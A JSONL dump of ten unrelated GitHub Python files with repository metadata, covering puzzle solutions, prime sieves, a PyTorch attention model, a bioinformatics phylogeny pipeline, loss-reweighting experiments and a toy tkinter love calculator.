+{"seq_id":"2978220931","text":"import sys; sys.dont_write_bytecode = True; from utils import *\n\ndef do_case(inp: str, sample=False):\n # READ THE PROBLEM FROM TOP TO BOTTOM OK\n def sprint(*a, **k): sample and print(*a, **k)\n lines = inp.splitlines()\n paras = inp.split(\"\\n\\n\")\n out = 0\n\n one, two = paras\n one = ints(one)[1:]\n two = ints(two)[1:]\n\n def score(winner):\n out = 0\n for i, x in enumerate(list(winner)[::-1]):\n out += (i+1) * x\n return out\n \n # @functools.lru_cache(maxsize=None)\n def one_won_and_winner(one, one_card, two, two_card):\n # print(one, one_card, two, two_card)\n if len(one) >= one_card and len(two) >= two_card:\n pass\n else:\n if one_card > two_card:\n return True, score(one)\n else:\n return False, score(two)\n one = one[:one_card]\n two = two[:two_card]\n one = deque(one)\n two = deque(two)\n seen = set() # (tuple(one), tuple(two))\n while one and two:\n hashed = (tuple(one), tuple(two))\n if hashed in seen:\n return True, score(one)\n seen.add(hashed)\n one_card = one.popleft()\n two_card = two.popleft()\n\n if one_won_and_winner(tuple(one), one_card, tuple(two), two_card)[0]:\n one.append(one_card)\n one.append(two_card)\n else:\n two.append(two_card)\n two.append(one_card)\n if one:\n return True, score(one)\n else:\n return False, score(two)\n \n\n\n print(one_won_and_winner(one, len(one), two, len(two)))\n\n\n\n if out:\n print(\"out: \", out)\n return # RETURNED VALUE DOESN'T DO ANYTHING, PRINT THINGS INSTEAD\n\n\n\nrun_samples_and_actual([\nr\"\"\"\nPlayer 1:\n9\n2\n6\n3\n1\n\nPlayer 2:\n5\n8\n4\n7\n10\n\n\"\"\",r\"\"\"\nPlayer 1:\n43\n19\n\nPlayer 2:\n2\n29\n14\n\n\"\"\",r\"\"\"\n\n\"\"\",r\"\"\"\n\n\"\"\",r\"\"\"\n\n\"\"\",r\"\"\"\n\n\"\"\",r\"\"\"\n\n\"\"\"], do_case)\n","repo_name":"mcpower/adventofcode","sub_path":"2020/22/a-p2.py","file_name":"a-p2.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"37"}
+{"seq_id":"23033550903","text":"import math\n\n# Sieve of Eratosthenes Python Code\ndef prime_eratosthenes(n):\n dump_list = []\n prime_list = []\n for i in range(2, n + 1):\n if i not in dump_list:\n prime_list.append(i)\n for j in range(i * i, n + 1, i):\n dump_list.append(j)\n return prime_list\n\n\n# Naive Approach Python Code\ndef prime_Naive(n):\n if n <= 1:\n return False\n for i in range(2, n):\n if n % i == 0:\n return False\n return True\n\n\ndef printPrime(n):\n prime_list = []\n for i in range(2, n + 1):\n if prime_Naive(i):\n prime_list.append(i)\n return prime_list\n\n\n# Sieve of Atkins Python Code\ndef prime_Atkins(n):\n prime_list = [2, 3]\n sieve = [False] * (n + 1)\n for x in range(1, int(math.sqrt(n)) + 1):\n for y in range(1, int(math.sqrt(n)) + 1):\n q = 4 * x ** 2 + y ** 2\n if q <= n and (q % 12 == 1 or q % 12 == 5):\n sieve[q] = not sieve[q]\n q = 3 * x ** 2 + y ** 2\n if q <= n and q % 12 == 7:\n sieve[q] = not sieve[q]\n q = 3 * x ** 2 - y ** 2\n if x > y and q <= n and q % 12 == 11:\n sieve[q] = not sieve[q]\n for x in range(5, int(math.sqrt(n))):\n if sieve[x]:\n for y in range(x ** 2, n + 1, x ** 2):\n sieve[y] = False\n\n for a in range(5, n):\n if sieve[a]:\n prime_list.append(a)\n return prime_list\n","repo_name":"Saro259/prime_number_generator","sub_path":"myproject/primeapp/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"74182104746","text":"class Solution(object):\n def maxCoins(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n nums = [1] + [num for num in nums if num > 0] + [1]\n n = len(nums)\n # n = 3\n dp = [[0] * n for _ in xrange(n)]\n\n for k in xrange(2,n):\n for left in xrange(0,n-k):\n right = left + k\n # print('-'*10)\n # print(\"left is {0}, right is {1}\".format(left, right))\n for i in xrange(left+1,right):\n dp[left][right] = max(dp[left][right], nums[left]*nums[i]*nums[right] + dp[left][i] + dp[i][right])\n # print(\"nums[left]*nums[i]*nums[right] is {0}, dp[left][i] is {1}, dp[i][right] is {2}\".format(nums[left]*nums[i]*nums[right], dp[left][i], dp[i][right]))\n # print(\"left is {0}, right is {1}, dp is {2}\".format(left, right, dp[left][right]))\n # print(\"result is left is {0}, right is {1}, result is {2}\".format(left, right, dp[left][right]))\n\n return dp[0][n-1]\n\n\nprint(Solution().maxCoins([3, 1, 5, 8]))","repo_name":"yuzixun/algorithm_exercise","sub_path":"main/20170503-312.py","file_name":"20170503-312.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"32353983887","text":"import os\nfrom setuptools import setup, find_packages\n\n__doc__ = \"\"\"A python library for communicating with LimitlessLED/Milight/Easybulb compatible wifi bridges.\"\"\"\n\nsetup(\n name=\"mookfist-lled-controller\",\n description=__doc__,\n version=\"0.1.5\",\n author=\"mookfist\",\n author_email=\"mookfist@gmail.com\",\n url=\"https://github.com/mookfist/mookfist-lled-controller\",\n scripts=['lled.py'],\n packages=find_packages(),\n install_requires=[\n 'docopt',\n 'colorama',\n 'sphinx_rtd_theme',\n 'six'\n ],\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'Topic :: Utilities',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3'\n ],\n keywords=['milight','limitlessled']\n)\n","repo_name":"mookfist/mookfist-lled-controller","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"23360009300","text":"import torch\r\nimport torch.nn as nn\r\nfrom torch.autograd import Variable\r\nimport torch.nn.functional as F\r\n\r\nclass AttentionRecurrentModel(nn.Module):\r\n def __init__(self, input_size, n_classes, hidden_dim, attn_dim=60, num_layers=1, bidirection=True, flag_cuda=False):\r\n '''\r\n Create a LSTM classifier initialize their weights.\r\n Take the weighted average of all hidden units for generating classes\r\n Arguments:\r\n input_size (tuple): A tuple of ints with (num of indices, time steps, feature_dimension) => (N, T, D)\r\n hidden_dim (int): Number of hidden activations to use\r\n n_classes (int): Number of classes to score\r\n attn_dim (int): Number of hidden nodes in attention layers\r\n num_layers (int): Number of LSTM layers\r\n bidirection(bool): Bidirection LSTM or not, for attention model the default value is True\r\n flag_cuda(bool): Whether cuda support is enabled or not\r\n '''\r\n super(AttentionRecurrentModel, self).__init__()\r\n self.input_size = input_size\r\n self.n_classes = n_classes\r\n self.hidden_dim = hidden_dim\r\n self.attn_dim = attn_dim\r\n self.num_layers = num_layers\r\n self.bidirection = bidirection\r\n if self.bidirection is True:\r\n self.num_direction = 2\r\n else:\r\n self.num_direction = 1\r\n # set batch_first to make input and output in tensor of (N,T,D) but not h0, c0\r\n self.lstm_layer = nn.LSTM(input_size=input_size[-1], hidden_size=hidden_dim, num_layers=self.num_layers, batch_first=True, bidirectional=self.bidirection)\r\n self.dropout_layer = nn.Dropout(p=0.2)\r\n self.fc_layer = nn.Linear(hidden_dim*self.num_direction , n_classes)\r\n self.attn = nn.Linear(self.hidden_dim*self.num_direction, 1, bias=False)\r\n self.flag_cuda = flag_cuda\r\n\r\n\r\n def init_hidden(self, batch_size):\r\n '''\r\n Init states\r\n :param batch_size (int)\r\n :return: initial hidden and cell states, both are tensors in (num_layers * num_directions, batch, hidden_size)\r\n '''\r\n h0, c0 = (Variable(torch.zeros(self.num_layers*self.num_direction, batch_size, self.hidden_dim)), Variable(torch.zeros(self.num_layers*self.num_direction, batch_size, self.hidden_dim)))\r\n if self.flag_cuda:\r\n h0, c0 = h0.cuda(), c0.cuda()\r\n return h0, c0\r\n\r\n def forward(self, x, lengths):\r\n batch_size = len(x)\r\n h, c = self.init_hidden(batch_size)\r\n sequence = nn.utils.rnn.pack_padded_sequence(x.float(), lengths, batch_first=True)\r\n hx_seq, (hn, cn) = self.lstm_layer(sequence, (h, c)) #hx_seq ( N, T, D)\r\n output, length_list = nn.utils.rnn.pad_packed_sequence(hx_seq, batch_first=True)\r\n (N, T, D) = output.size()\r\n step_vector = self.attn(output.contiguous().view(-1, self.hidden_dim*self.num_direction)) # out_dim (N*T, 1)\r\n attn_weights = F.softmax(F.tanh(step_vector.view(-1, T))) # out_dim (N, T)\r\n\r\n # create mask based on valid lengths\r\n mask = torch.ones(attn_weights.size())\r\n for i, l in enumerate(length_list):\r\n if l < T:\r\n mask[i, l:] = 0\r\n\r\n # apply mask and re-normalize attention weights\r\n mask = Variable(mask)\r\n if self.flag_cuda:\r\n mask = mask.cuda()\r\n masked = attn_weights*mask\r\n _sums = masked.sum(-1).unsqueeze(1).expand_as(attn_weights)\r\n attentions = masked.div(_sums)\r\n\r\n # Size of attn_weights/attentions should be (N, T, 1)\r\n temp_attn =attentions.view(-1, T, 1).repeat(1,1,self.hidden_dim*self.num_direction) # out_dim (N,T,1)=> (N,T,H)\r\n # Calculating weighted sum of hidden states\r\n attn_applied = torch.mul(temp_attn, output) # out_dim (N,T,H)\r\n weighted = 
torch.sum(attn_applied, dim=1)\r\n score = self.fc_layer(self.dropout_layer(torch.squeeze(weighted, dim=1)))\r\n return score\r\n","repo_name":"Saqibm128/sepsisProject","sub_path":"learning/deepLearn/model/attention_rnn_pad.py","file_name":"attention_rnn_pad.py","file_ext":"py","file_size_in_byte":4041,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
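A forward-pass sketch with made-up sizes; pack_padded_sequence as called here needs the batch sorted by decreasing length (older PyTorch has no enforce_sorted=False), and recent versions will emit deprecation warnings for F.tanh and for F.softmax without an explicit dim:

```python
import torch

model = AttentionRecurrentModel(input_size=(8, 20, 40), n_classes=5,
                                hidden_dim=64, num_layers=1, bidirection=True)
x = torch.randn(8, 20, 40)                # (N, T, D), zero-padded past each length
lengths = [20, 18, 15, 15, 12, 9, 7, 4]   # must be sorted in decreasing order
scores = model(x, lengths)
print(scores.shape)                       # torch.Size([8, 5])
```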
+{"seq_id":"15920604580","text":"from enum import Enum\n\nclass Motion(Enum):\n R = [0, 1]\n L = [0, -1]\n U = [1, 0]\n D = [-1, 0]\n\ndef moveRight(knot):\n knot[1] += 1\n return knot\n\ndef moveLeft(knot):\n knot[1] += -1\n return knot\n\ndef moveUp(knot):\n knot[0] += 1\n return knot\n\ndef moveDown(knot):\n knot[0] += -1\n return knot\n\ndef isTouching(head, tail):\n if abs(head[0] - tail[0]) == 1 and abs(head[1] - tail[1]) == 1:\n return True\n\ndef moveTail(head, tail):\n if head[0] == tail[0] and head[1] == tail[1]:\n return tail\n if head[0] == tail[0] and head[1] - tail[1] > 1:\n tail = moveRight(tail)\n return tail\n if head[0] == tail[0] and head[1] - tail[1] < -1:\n tail = moveLeft(tail)\n return tail\n if head[1] == tail[1] and head[0] - tail[0] > 1:\n tail = moveUp(tail)\n return tail\n if head[1] == tail[1] and head[0] - tail[0] < -1:\n tail = moveDown(tail)\n return tail\n if (head[0] - tail[0] > 0 and head[1] - tail[1] > 0) and not isTouching(head, tail):\n tail = moveUp(tail)\n tail = moveRight(tail)\n return tail\n if (head[0] - tail[0] > 0 and head[1] - tail[1] < 0) and not isTouching(head, tail):\n tail = moveUp(tail)\n tail = moveLeft(tail)\n return tail\n if (head[0] - tail[0] < 0 and head[1] - tail[1] > 0) and not isTouching(head, tail):\n tail = moveDown(tail)\n tail = moveRight(tail)\n return tail\n if (head[0] - tail[0] < 0 and head[1] - tail[1] < 0) and not isTouching(head, tail):\n tail = moveDown(tail)\n tail = moveLeft(tail)\n return tail\n \n return tail\n\nwith open(\"Day 9/motions.txt\") as motions:\n headIndex = [0, 0]\n tailIndex = [0, 0]\n headIndexDict = {str(headIndex) : 1}\n tailIndexDict = {str(tailIndex) : 1}\n for line in motions:\n motion = line.split()\n for i in range(int(motion[1])):\n headIndex[0] += Motion[motion[0]].value[0]\n headIndex[1] += Motion[motion[0]].value[1]\n if str(headIndex) in headIndexDict:\n headIndexDict[str(headIndex)] += 1\n else:\n headIndexDict[str(headIndex)] = 1\n\n tailIndex = moveTail(headIndex, tailIndex)\n if str(tailIndex) in tailIndexDict:\n tailIndexDict[str(tailIndex)] += 1\n else:\n tailIndexDict[str(tailIndex)] = 1\n #print(tailIndex)\n\n print(len(tailIndexDict))","repo_name":"coltrane05/AdventOfCode2022","sub_path":"Day 9/Day9Solution1.py","file_name":"Day9Solution1.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"24956903531","text":"import os\nimport sys\nimport datetime\nimport argparse\nimport time\n\ntoday = datetime.date.today().strftime('Results_%b%d')\n\n\ndef get_parameters():\n parse = argparse.ArgumentParser()\n parse.add_argument('-i', required=True, action='store', help='Input a directory contains genome files, and the genomes must end with (.fa, .fna., .fasta)')\n parse.add_argument('-a', required=True, action='store', help='Output directory contains proteins (.faa)')\n parse.add_argument('-t', required=True, action='store', help='Threads used for prokka,orthofinder')\n args = parse.parse_args()\n return args\n\n\n\ndef prokka_(genomes_dir, threads):\n endslist = ['fa', 'fna', 'fasta']\n to_dir = 'final_prokka'\n if not os.path.exists(to_dir):\n os.mkdir(to_dir)\n for i in os.listdir(genomes_dir):\n ends_ = i.split(\".\")[-1]\n if ends_ in endslist:\n genomes_path = os.path.join(genomes_dir, i)\n outdir = f'{to_dir}/{i.split(\".f\")[0]}'\n prefix = f'{i.split(\".f\")[0]}'\n cmd = f\"prokka --outdir {outdir} --prefix {prefix} --noanno --norrna --notrna --locustag '{prefix}|ORF' --cpus {threads} {genomes_path}\"\n print(cmd)\n os.system(cmd)\n\ndef orthofinder_(faa_dir, threads):\n if not os.path.exists(faa_dir):\n os.mkdir(faa_dir)\n try:\n cp_cmd = f'cp final_prokka/*/*faa {faa_dir}'\n os.system(cp_cmd)\n except Exception:\n pass\n if not os.path.exists(f'{faa_dir}/OrthoFinder'):\n cmd_ = f'orthofinder -og -f {faa_dir} -t {threads}'\n os.system(cmd_)\n\n\ndef clusto_(faa_dir):\n out_put = 'final_clustalo_fasta'\n if not os.path.exists(out_put):\n os.mkdir(out_put)\n #for i in os.listdir(\"faa_dir/OrthoFinder/\"):\n\t\n for i in os.listdir(\"faa_dir/OrthoFinder/\" + today + \"/Single_Copy_Orthologue_Sequences\"):\n name = i.split(\".f\")[0]\n to_name = f'{out_put}/{name}.fasta'\n cmd = f'clustalo -i {faa_dir}/OrthoFinder/{today}/Single_Copy_Orthologue_Sequences/{i} -o {to_name}'\n os.system(cmd)\n print(cmd)\n\ndef align_():\n cmd = 'python AlignConcat.py -i final_clustalo_fasta -o final.aln'\n os.system(cmd)\n\n\ndef gblock_():\n cmd = 'sh Gblocks.sh final.aln'\n os.system(cmd)\n\n\ndef iqtree_():\n cmd = 'iqtree -s final.aln-gb -m LG+F+R4 -bb 1000 -nt 45'\n os.system(cmd)\n\nif __name__ == '__main__':\n #python tree_build_orthofinder.py -i genomes -a faa_dir -t 60 \n\n arge = get_parameters()\n genomes_dir = arge.i\n faa_dir = arge.a\n threads = arge.t\n\n\n clusto_dir = 'final_clustalo_fasta'\n\n if not os.path.exists(faa_dir):\n prokka_(genomes_dir, threads)\n\n \n orthofinder_(faa_dir, threads)\n time.sleep(5)\n \n if not os.path.exists(clusto_dir):\n clusto_(faa_dir)\n if not os.path.exists('final.aln'):\n align_()\n\n #if not os.path.exists('final.aln-gb'):\n gblock_()\n\n iqtree_()\n\n\n\n\n\n\n","repo_name":"allen-zhan340/bacteria-phylogeny-procedure","sub_path":"tree_build_orthofinder.py","file_name":"tree_build_orthofinder.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"22556336928","text":"import json\nimport sys, torch\nfrom torch import nn\nfrom math import ceil\nfrom sklearn import datasets\nfrom matplotlib import pyplot as plt\nfrom torch.nn.functional import sigmoid\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.distributions.exponential import Exponential\nfrom scipy.stats import spearmanr\nfrom util_functions.jacobian import truncated_sqrt_exponential_pdf\nfrom classes_losses.acquisition_prediction_losses import ImportanceWeightedBCELoss, NonParametricJacobianTransformedBCELoss, SqrtExponentialJacobianTransformedBCELoss, AdditionImportanceWeightedBCELoss, RescaleBCELoss\n\n\n\nclass LogRegDataset(Dataset):\n\n def __init__(self, x, t):\n self.x = x\n self.t = t\n super(LogRegDataset, self).__init__()\n\n def __getitem__(self, index):\n return self.x[index], self.t[index]\n\n def __len__(self):\n return len(self.x)\n\n\nclass LogRegModel(nn.Module):\n\n def __init__(self):\n super(LogRegModel, self).__init__()\n self.layer = nn.Linear(1, 1)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x: torch.Tensor):\n batch_size = x.size(0)\n x = x.reshape(batch_size, -1, 1)\n x = self.layer(x)\n x = self.sigmoid(x)\n return x\n\n\nclass Simple2DNN(nn.Module):\n\n def __init__(self):\n super(Simple2DNN, self).__init__()\n\n hidden_size = 5\n\n self.layers = nn.Sequential(\n nn.Linear(2, hidden_size), nn.Tanh(), \n # nn.Linear(hidden_size, hidden_size), nn.Tanh(), \n nn.Linear(hidden_size, 1, bias = False), nn.Sigmoid()\n )\n\n def forward(self, x):\n return self.layers(x)\n\n\ndef train_model(model, trainset, testset, opt, crit, num_epochs):\n\n # Initialise loss/rank curves\n train_loss, test_loss, rank_history = [], [], []\n\n for epoch in range(num_epochs):\n\n # Initialise average losses\n epoch_train_loss, epoch_test_loss = 0, 0\n num_train_points, num_test_points = len(trainset.dataset), len(testset.dataset)\n\n model.train()\n \n # Train loop\n for batch in trainset:\n\n opt.zero_grad()\n \n # Unpack batch\n x, t = batch\n \n # Predictions\n y = model(x)\n\n # Get the loss value\n loss = crit(y, t)\n\n # Step\n loss.backward()\n opt.step()\n\n epoch_train_loss += loss.item() / num_train_points\n\n model.eval()\n\n test_batches = []\n test_preds = []\n\n with torch.no_grad():\n\n # Test loop\n for batch in trainset:\n\n opt.zero_grad()\n \n # Unpack batch\n x, t = batch\n \n # Predictions\n y = model(x)\n\n # Save these for the rank metrics\n test_batches.append(t)\n test_preds.append(y)\n\n # Get the loss value\n loss = crit(y, t)\n\n epoch_test_loss += loss.item() / num_test_points\n\n # Calculate rank\n all_ts = torch.concat(test_batches).numpy()\n all_ys = torch.concat(test_preds).numpy()\n s_rank_coeff = spearmanr(all_ys, all_ts)[0]\n\n rank_history.append(s_rank_coeff)\n train_loss.append(epoch_train_loss)\n test_loss.append(epoch_test_loss)\n\n print(f'Epoch {epoch} || Train loss: {round(epoch_train_loss, 5)} | Test loss: {round(epoch_test_loss, 5)} | Test rank {round(s_rank_coeff, 5)}')\n\n return train_loss, test_loss, rank_history\n\n\ndef generate_poly_dataset():\n def bias_regression_function(x, a = 1.1, m = 2.3, S = 3.3):\n \"\"\"\n Desmose form:\n f\\left(x\\right)\\ =\\ 0.65+\\frac{\\left(\\frac{x}{m}-\\left(ax\\right)^{4}-\\left(x\\right)^{14}+0.75\\right)}{S}\\left\\{-1\\le x\\le1\\right\\}\n \"\"\"\n numerator = (x/m) - (a*x)**4 - x**14 + 0.75\n return 0.35 - numerator / S\n\n data_x = 2 * torch.rand(dataset_size) - 1\n data_f = bias_regression_function(data_x)\n data_t = torch.clip(data_f + 0.1 * 
torch.randn_like(data_f), 0., 1.)\n\n return data_x, data_t\n\n\ndef generate_sigmoid_dataset():\n\n x = torch.linspace(-1, 1, 50)\n t = sigmoid(x)\n\n # Generate the data\n dist = Exponential(0.2)\n data_x = dist.sample_n(dataset_size) - 15\n data_t = sigmoid(data_x/6.)\n\n # Apply transforms\n data_x /= 12.\n data_x += torch.randn_like(data_x)\n data_t -= data_t.min()\n data_t /= data_t.max()\n # data_t = data_t + (torch.randn_like(data_t) * 0.05)\n\n return data_x, data_t\n\n\ndef generate_2D_dataset():\n \n # How many times more class 0 than class 1 (class 0 being sampled from a lower mean distribution)\n bias_ratio = 1.2\n\n # How many datapoints to generate then crop\n _N = int(2 * bias_ratio * dataset_size/(bias_ratio + 1))\n\n # Generate a balanced number of class 0s and 1s\n X, y = datasets.make_moons(_N, noise=0.2, shuffle=False, random_state=42)\n y = torch.tensor(y).float(); y += torch.rand_like(y)*0.1\n y, X = zip(*sorted(zip(y, X), key=lambda x: x[0]))\n X, y = torch.tensor(X), torch.tensor(y)\n\n # Crop dataset to induce bias\n X, y = torch.stack([X[:dataset_size]])[0], torch.stack([y[:dataset_size]])[0]\n\n # More 0s than 1s, and they have the lower mean\n class_0_mean = 4.5\n class_1_mean = 20\n\n # Sample the whole thing\n class_0_samples = Exponential(1/class_0_mean).sample(y.shape)\n class_1_samples = Exponential(1/class_1_mean).sample(y.shape)\n\n # Filter which sample gets what\n y = class_0_samples * (y<0.5).to(int) + class_1_samples * (y>=0.5).to(int)\n\n # Bound outputs\n y = 2*(torch.sigmoid(y/50) - 0.5)\n\n return X.float(), y.float()\n\n\n\nif __name__ == '__main__':\n\n dataset_size = 5000\n\n if sys.argv[1] == 'show_dataset':\n data_x, data_t = generate_2D_dataset()\n \n fig = plt.figure(figsize = (8, 4))\n ax1 = fig.add_subplot(122, projection = '3d')\n ax2 = fig.add_subplot(121)\n\n ax1.scatter(data_x[:,0].numpy(), data_x[:,1].numpy(), data_t.numpy(), c=data_t.numpy())\n ax1.view_init(azim=50)\n ax2.hist(data_t.numpy(), 50)\n\n ax2.set_xlabel()\n\n fig.savefig('jacobian_investigation/2D_dataset.png')\n\n plt.show()\n\n exit() \n\n # Trial parameters, dataset, and model we are using\n if True:\n dataset_name = sys.argv[1]\n\n jacobian = sys.argv[2]\n assert jacobian in ['j', 'nj', 'jnp']\n\n reweigher = sys.argv[3]\n assert reweigher in ['rw', 'rwoff', 'nrw']\n\n if dataset_name == 'poly':\n data_x, data_t = generate_poly_dataset()\n model = LogRegModel()\n\n elif dataset_name == 'sigmoid':\n data_x, data_t = generate_sigmoid_dataset()\n model = LogRegModel()\n\n elif dataset_name == '2D':\n data_x, data_t = generate_2D_dataset()\n model = Simple2DNN()\n\n # Training parameters\n lr = 0.005\n num_epochs = 500\n test_prop = float(sys.argv[4])\n batch_size = 256\n\n # Sort out data\n testset_size = ceil(test_prop * dataset_size)\n trainset_size = dataset_size - ceil(test_prop * dataset_size)\n master_dataset = LogRegDataset(data_x, data_t)\n train_dataset, test_dataset = torch.utils.data.random_split(master_dataset, [trainset_size, testset_size])\n train_dataloader, test_dataloader = DataLoader(train_dataset, batch_size=batch_size), DataLoader(test_dataset, batch_size=batch_size)\n\n # Get this for the Jacobian case\n train_targets = data_t[train_dataset.indices]\n test_targets = data_t[test_dataset.indices]\n\n # Optimiser\n optimiser = torch.optim.SGD(lr=lr, params=model.parameters())\n\n # Star of the show: loss function\n # do we use Jacobian or not?\n if jacobian == 'j':\n criterion_type = SqrtExponentialJacobianTransformedBCELoss\n criterion_args = 
[train_targets, 0.00001, torch.tensor(6), 200, lambda x: x]\n if jacobian == 'jnp':\n criterion_type = NonParametricJacobianTransformedBCELoss\n criterion_args = [train_targets, 500, lambda x: x]\n elif jacobian == 'nj':\n criterion_type = RescaleBCELoss\n criterion_args = [torch.tensor(1)]\n\n # do we do loss reweighting or now?\n if reweigher == 'rw':\n # For now, fix the num bins to 50, and only update once\n criterion = AdditionImportanceWeightedBCELoss(criterion_type(*criterion_args), 50, dataset_size)\n elif reweigher == 'rwoff':\n criterion = AdditionImportanceWeightedBCELoss(criterion_type(*criterion_args), 50, train_targets)\n elif reweigher == 'nrw':\n criterion = criterion_type(*criterion_args)\n\n print('Starting training')\n\n train_loss, test_loss, rank_history = train_model(model, train_dataloader, test_dataloader, optimiser, criterion, num_epochs)\n\n # Plot dataset and results\n fig, axs = plt.subplots(2, 3, figsize = (15, 10))\n\n # First dataset/function plotting method only works for 1D input\n if dataset_name != '2D':\n axs[0, 0].scatter(data_x.numpy(), data_t.numpy())\n axs[0, 0].set_title('dataset')\n\n # Get the model curve\n model.eval()\n x = torch.linspace(-1, 4, 50)\n fitted_function = model(x).detach().reshape(-1)\n axs[0, 0].plot(x.numpy(), fitted_function.numpy())\n\n if jacobian in ['j', 'jnp']:\n # If using the Jacobian distribution, histogram the transformed training data\n transformed_targets = criterion._transform_target(test_targets)\n axs[0, 2].set_title(f'J transformed data')\n axs[0, 2].hist(transformed_targets.numpy(), 50, density = True)\n\n if jacobian in ['j']:\n # If using the Jacobian distribution, histogram the transformed training data\n transformed_targets = criterion._transform_target(test_targets)\n axs[0, 2].set_title(f'J transformed data, $\\\\beta = {criterion.beta.item()}$')\n axs[0, 2].hist(transformed_targets.numpy(), 50, density = True)\n\n # Also plot the fitted truncated sqrt exponential pdf\n x = torch.linspace(0, 1, 50)\n y = truncated_sqrt_exponential_pdf(x, criterion.beta)\n axs[0, 1].plot(x, y)\n\n axs[0, 1].set_title('target distribution')\n axs[0, 1].hist(data_t.numpy(), 50, density = True)\n\n axs[1, 0].plot(train_loss); axs[1, 0].set_title('train_loss')\n axs[1, 1].plot(test_loss); axs[1, 1].set_title('test_loss')\n\n # Scatted the model predictions\n # preds = model(data_x[test_dataset.indices]).detach().reshape(-1)\n # axs[1, 2].scatter(test_targets.numpy(), preds.numpy())\n\n axs[1, 2].plot(rank_history)\n\n # axs[1, 2].plot([0, 1], [0, 1], color = 'black')\n\n if len(sys.argv) > 5:\n results = {\n 'jacobian_setting': jacobian,\n 'reweigher_setting': reweigher,\n 'test_prop': test_prop,\n 'train_loss': train_loss,\n 'test_loss': test_loss,\n 'rank_history': rank_history\n }\n json_path = sys.argv[5]\n with open(json_path, 'w') as f:\n json.dump(results, f)\n else:\n fig.savefig(f'jacobian_investigation/{dataset_name}-{sys.argv[2]}-{sys.argv[3]}-{test_prop}.png')\n\n\n","repo_name":"puria-radmard/iib_project","sub_path":"jacobian_investigation/loss_reweight_test.py","file_name":"loss_reweight_test.py","file_ext":"py","file_size_in_byte":11211,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
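The reweighting idea this script exercises - upweighting examples whose target values are rare - can be illustrated with inverse bin-frequency weights. A generic sketch only (the repo's AdditionImportanceWeightedBCELoss may compute its weights differently):

import torch

def inverse_frequency_weights(targets: torch.Tensor, num_bins: int = 50) -> torch.Tensor:
    # Histogram the [0, 1] targets, then weight each example by the inverse
    # of its bin's relative frequency; uniformly filled bins give weight ~1.
    counts = torch.histc(targets, bins=num_bins, min=0.0, max=1.0)
    bin_idx = torch.clamp((targets * num_bins).long(), max=num_bins - 1)
    return targets.numel() / (num_bins * counts[bin_idx].clamp(min=1.0))

Such per-example weights would multiply the BCE terms before reduction.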
+{"seq_id":"39026472400","text":"from tkinter import *\r\nfrom tkinter import messagebox\r\nimport random\r\nfrom tkinter.messagebox import showinfo\r\nfrom PIL import Image,ImageTk\r\n\r\nroot=Tk()\r\nroot.title(\"Love calculater\")\r\ndef love_calculate():\r\n if name_entry.get()==\"\" or p_name_entry.get()==\"\" :\r\n messagebox.showwarning(\"warning\",\"please fill all the fields\")\r\n \r\n else:\r\n percentage=random.randint(60,100)\r\n emoji=\"\\u2764\\uFE0F\"\r\n showinfo(\"Love percentage\",f\"Love bird's love is{emoji} {percentage}%\")\r\n\r\nimg_open=Image.open(\"chubby.jpg\")\r\nrender_img=ImageTk.PhotoImage(img_open)\r\noriginal_img=Label(root,image=render_img)\r\noriginal_img.grid(row=0,columnspan=2)\r\n\r\n\r\nname=Label(root,text=\"Enter your name :\",font=(\"ariar\",10,\"bold\"))\r\nname.grid(row=2,column=0)\r\n\r\n\r\nname_entry=Entry(root,font=(\"ariar\",10,\"bold\"))\r\nname_entry.grid(row=2,column=1)\r\n\r\n\r\np_name=Label(root,text=\"Enter your partner name :\",font=(\"ariar\",10,\"bold\"))\r\np_name.grid(row=3,column=0)\r\n\r\n\r\np_name_entry=Entry(root,font=(\"ariar\",10,\"bold\"))\r\np_name_entry.grid(row=3,column=1)\r\n\r\n\r\nbutton=Button(root,text=\"Check your love\",bg=\"red\",fg=\"white\",command=love_calculate)\r\nbutton.grid(row=4,columnspan=2)\r\n\r\nroot.mainloop()\r\n\r\n","repo_name":"shaikaneef/LoveCalculater","sub_path":"love_calculater.py","file_name":"love_calculater.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"22105939373","text":"number = input()\nif(number.isnumeric()):\n number=int(number)\nlst = []\nfor i in range(1, number+1):\n row = []\n for j in range(1, i+1):\n row.append(i*j)\n lst.append(row)\nprint(lst[::2])\n","repo_name":"MohammedMahmoud20/iti_summer_training_python_labs","sub_path":"first_day/lab6.py","file_name":"lab6.py","file_ext":"py","file_size_in_byte":207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
